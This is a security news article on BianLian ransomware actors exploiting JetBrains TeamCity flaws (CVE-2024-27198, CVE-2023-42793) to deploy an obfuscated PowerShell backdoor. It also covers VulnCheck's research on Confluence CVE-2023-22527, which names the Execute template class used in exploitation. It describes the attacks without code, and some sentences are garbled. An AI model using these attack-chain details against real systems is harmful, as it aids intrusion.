Threat actors behind the BianLian ransomware have been observed to exploit security flaws in JetBrains TeamCity software to conduct their extortion-only attacks.
According to a new report from GuidePoint Security, which responded to a recent intrusion, the incident “began with the exploitation of a TeamCity server that led to the deployment of a PowerShell implementation of BianLian’s Go backdoor.”
BianLian emerged in June 2022 and has since focused exclusively on exfiltration-based extortion following the release of a decryptor in January 2023.
The attack chain observed by the cybersecurity firm involves exploiting a vulnerable instance of TeamCity using CVE-2024-27198 or CVE-2023-42793 to gain initial access to the environment, followed by the creation of new users in the build server and from executing malicious commands for post-exploitation and lateral movement.
It is currently unclear which of the two flaws was used as a weapon by the threat actor for the infiltration.
BianLian actors are known to implant a custom backdoor tailored to each victim written in Go, as well as releasing remote desktop tools such as AnyDesk, Atera, SplashTop, and TeamViewer. The backdoor is tracked by Microsoft as BianDoor.
“After numerous failed attempts to run the standard Go backdoor, the threat actor pivoted to life above ground and leveraged a PowerShell implementation of the backdoor, which provides nearly identical functionality to what he would have with the Go backdoor ,” said security researchers Justin Timothy, Gabe Renfro and Keven Murphy.
The obfuscated PowerShell backdoor (“web.ps1”) is designed to establish a TCP socket for additional network communications with an actor-controlled server, allowing remote attackers to conduct arbitrary actions on an infected host.
“The now confirmed backdoor is capable of communicating with the [command-and-control] server and executed asynchronously based on the remote attacker’s post-exploitation objectives,” the researchers said.
The disclosure comes after VulnCheck detailed new proof-of-concept (PoC) exploits for a critical security flaw impacting Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527) that could lead to execution of remote code without file and load the file. Godzilla web shell directly in memory.
Over the past two months the flaw has been weaponized to deploy C3RB3R ransomware, cryptocurrency miners, and remote access Trojans, indicating widespread exploitation in the wild.
“There’s more than one way to get to Rome,” noted VulnCheck’s Jacob Baines. “While using freemarker.template.utility.Execute appears to be the most popular way to exploit CVE-2023-22527, other, more hidden paths generate different indicators.”